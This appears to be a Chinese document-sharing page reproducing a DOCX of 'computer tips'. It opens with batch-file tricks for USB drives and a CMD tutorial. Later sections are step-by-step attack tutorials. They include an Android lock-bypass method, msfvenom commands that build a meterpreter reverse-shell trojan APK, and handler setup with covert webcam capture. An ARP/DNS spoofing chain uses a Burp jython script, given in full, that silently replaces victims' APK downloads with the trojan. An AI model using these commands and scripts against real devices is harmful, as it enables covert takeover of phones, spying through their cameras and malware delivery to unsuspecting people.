电脑操作技巧.docx
- 文档编号:12104930
- 上传时间:2023-06-04
- 格式:DOCX
- 页数:14
- 大小:2.51MB
电脑操作技巧.docx
《电脑操作技巧.docx》由会员分享,可在线阅读,更多相关《电脑操作技巧.docx(14页珍藏版)》请在冰点文库上搜索。
电脑操作技巧
电脑操作技巧
让U盘变成只读的
先新建一个文本文档,然后把下面的代码复制过去,然后再另存为“加锁.bat”。
@echooffechoechoregaddHKLM\SYSTEM\CurrentControlSet\Control\StorageDevicePolicies/vWriteProtect/tREG_DWORD/d00000001echo成功pause
当要防止U盘复制的时候双击这个文件就可以了,恢复的方法就是将00000001变成00000000保存后运行就可以了。
让U盘锁住你的笔记本!
U盘密钥制作方法,可以有效的闲置私人电脑被他人使用,既安全,又简单!
没有密钥谁也搞不起!
准备好一个闲置的U盘,容量大小不限(128MB的也可以)。
插入电脑后先将其格式化为FAT32格式,如下图:
在U盘内创建一个TXT文件(新建文档),名字任意,此文档的用意就是使其可以正确的识别优盘信息,也是启动密钥的文件。
在文档中输入:
@echooffifnotexistG:
\aa.txtshutdown-s-t5-c"请插入启动钥匙,否则无法登录系统"
注意拼写正确及标点,其中G为你的U盘盘符填写正确后,确认无误保存即可。
然后将TXT文档复制到桌面上,双击打开文档,将其另存为“U盘密钥.bat”文件形式。
当完成.bat文件创建后,返回U盘中新建一个aa.txt文件。
此上操作完成以后,计算机开机会自动扫描U盘里的信息,查看是否有aa.txt文件,如果没有查找到,系统会在五分钟内强制关闭计算机
优盘密钥本地组策略设置本地组策略设置由于目前市场上计算机种类出厂设置的不同,为了确保计算机开机时可以自动加载U盘密钥.txt文件(最早创建的文本),我们还需进入计算机“本地组策略编辑器”进行一些设置。
点击开始→在搜索框内输入Gpedit.msc→进入本地组策略设置
依次展开“计算机配置→Windows设置→脚本”分支,然后双击启动项。
接着选择“添加”按钮,并单击“浏览”按钮选择桌面上已经设置好的优盘密钥.bat文件。
加载完毕后单击“确定”即可。
现在重启你的计算机试试此类本地安全措施是否有效!
安卓手机忘记密码
第一种方法:
桌面RE管理器
手机端的RE资源管理器,桌面端也有!
这款RE管理器权限是和手机端一样的,操作需谨慎啊!
另一种是用的文件夹连接:
第二种方法
删除密码文档。
这个方法的原理和我们之前讨论破解Windows密码类似,PC系统的密码是存在Sam里的,而Android系统密码是存在password.key文件里面的。
所以说,我们如果能删除掉这个文件,安卓系统的密码就解了!
找到那个*.key文件删除就可以了
CMD命令教程
CMD是什么?
在windows环境下,命令行程序为cmd.exe,是一个32位的命令行程序,微软Windows系统基于Windows上的命令解释程序,类似于微软的DOS操作系统。
输入一些命令,cmd.exe可以执行,比如输入shutdown-s就会在30秒后关机。
总之,它非常有用。
打开方法:
开始-所有程序-附件或开始-寻找-输入:
cmd/cmd.exe回车。
它也可以执行BAT文件。
运行CMD开启
开启
按下win+R或者开始菜单点击运行,输入cmd或者是command,回车,就会弹出一个黑框,这种叫做控制台程序,以前的老系统都是这样的,靠输入命令操作。
②使用一个命令
实践
输入echohelloworld回车显示helloworld
输入提示
cmd调用各种命令无非就是这样的格式命令名[空格]参数1[空格]参数2....
③认识变量
什么是变量?
(会编程的自行跳过)变量就像一个盒子,你能过把一段数据存入这个盒子,当你需要时再取出来。
就像“代数式”一样,例如a+1=?
我们设a为1,就是指定义一个变量,值为1,然后这个式子等价于1+1。
cmd中使用
方式①自行设定seta=1输入这条命令后就完成了变量的定义并赋值为1。
怎么调用变量?
如调用变量a则书写为%a%可以这样查看赋值结果:
echo%a%回车显示1方式②从控制台输入set/pa=这个命令是让使用者自行输入变量的值。
注意如果写成这样set/pa=1a的值不会是1!
a只会变成提示语。
例如set/pa=请输入命令
回车显示
然后再输入233回车继而输入echo%a%回车显示233我们可以利用set/p来进行与用户的交互。
【每日黑客】MSF入侵安卓手机案例实践
这篇文章主要介绍了MSF入侵安卓手机的详细过程,又介绍了MSF是什么、以及作用,感兴趣的小伙伴们可以参考一下
MSF是Metasploit的简称,Metasploit是一款开源的安全漏洞检测工具,非常强大,分别有Windows版和Linux版,工具里集成了许多微软公布的漏洞(0day)。
我这里做测试的系统是Backboxlinux,这是一款网络渗透,信息安全评估系统。
里边安装了许许多多的工具。
其中MSF就自带有。
当然还有其它的比如Kalilinux、BackTrack这些等等。
环境:
Backboxlinux+MSF
目标:
一台安卓手机
既然是入侵安卓手机,肯定要先配置一个安卓木马,那我们看看本机的IP
本机IP:
192.168.1.6
在到终端输入命令:
msfvenom-pandroid/meterpreter/reverse_tcpLHOST=192.168.1.7LPORT=5555R>/root/apk.apk
以前的MSF老版本是用msfpayload生成木马现在在新版本中都用msfvenom代替了,所以有些朋友在终端输入msfpayload的时候会提示
msfpayload无法找到命令所以使用msfvenom即可,这里LHOST对应的是本机的IP地址LPORT对应你要监听的端口然后生成木马的路径
这样我们就在/root/路径下生成了一个APK的安卓木马文件,至于木马的免杀暂且不谈。
现在我们在来启动MSF工具
输入命令:
msfconsole
然后输入:
1.useexploit/multi/handler加载模块
2.setpayloadandroid/meterpreter/reverse_tcp选择Payload
3.showoptions查看参数设置
我们看见payload里边有两个参数要设置LHOST和LPORT表示地址和端口默认的端口是4444现在我们来更改设置
1.setLHOST192.168.1.6这里的地址设置成我们刚才生成木马的IP地址
2.setLPORT5555这里的端口设置成刚才我们生成木马所监听的端口
3.exploit开始执行漏洞开始监听...
OK,一切准备工作准备就绪。
。
。
现在要做的就是把木马文件搞到人家的手机上,思路有很多可以DNSarp劫持欺骗只要对方用手机下载文件就会下载我们的木马文件。
还有社工什么等等的,这里我就简单的把木马文件弄我自己的手机上做测试
安装完成后会在桌面上生成一个MainActivity的程序图标这个就是我们刚才生成的木马当我们点击了这个图标手机会没有任何反应其实木马已经开始运行起来了
我们可以在我们的MSF里看见有一个会话连接了
这样对方的手机就就被我们控制了,查看手机系统信息,输入命令sysinfo
webcam_list查看手机摄影头有几个这里显示两项分别表示有前后两个摄像头
webcam_snap隐秘拍照功能
后边跟上参数-i指定使用那个摄像头拍照
可以看见我们分别对前后摄像头都拍了照保存到了桌面上
还可以输入命令webcam_stream开启摄像头
内网渗透之手机控制
从wifi破解到pc及手机控制,给大家分享个手机下载apk替换的方法
(一)环境:
目标机:
192.168.247.130
渗透机kali:
192.168.247.129
网关:
192.168.247.2
(二)用到的工具:
1.arpspoof
2.dnsspoof
3.burp
4.jython-burp-api(kali里没有集成,需要另外安装,详细请参见:
(三)步骤:
1.使用arpspoof来发送arp欺骗包;
arpspoof-ieth0-t192.168.247.130192.168.247.2
2.使用dnsspoof进行dns欺骗;
3.使用msf来生成一个安卓木马;
4.msf进行监听,等待木马反弹连接;
5.编写python脚本,用于apk下载重定向,代码如下,注意:
将这段代码保存到jython-burp-api下的Lib目标下,并命名为testplugin.py;
1.fromgds.burp.apiimportIProxyRequestHandler
2.fromgds.burp.coreimportComponent,implements
3.classExamplePlugin(Component):
4.implements(IProxyRequestHandler)
5.defprocessRequest(self,request):
6.if".apk"inrequest.url.geturl():
7.print"apkdownloaddetected,redirecting"
8.request.host="192.168.4.84"
9.request.raw=("GET/1.apkHTTP/1.1\r\n"+
10."HOST:
192.168.4.84\r\n\r\n")
6.编辑jython-burp-api中的burp.ini配置文件;
7.启动burp,命令:
java-Xmx1g-jarburpsutie.jar
8.对burp进行设置
9.在burp里加载jython
10.当目标开始下载apk的时候,就会替换为我们指定的apk进行下载
11.这时burp中的jython控制台如下:
12.当目标安装并运行下载的apk后msf成功收到反弹;
- 配套讲稿:
如PPT文件的首页显示word图标,表示该PPT已包含配套word讲稿。双击word图标可打开word文档。
- 特殊限制:
部分文档作品中含有的国旗、国徽等图片,仅作为作品整体效果示例展示,禁止商用。设计者仅对作品中独创性部分享有著作权。
- 关 键 词:
- 电脑 操作 技巧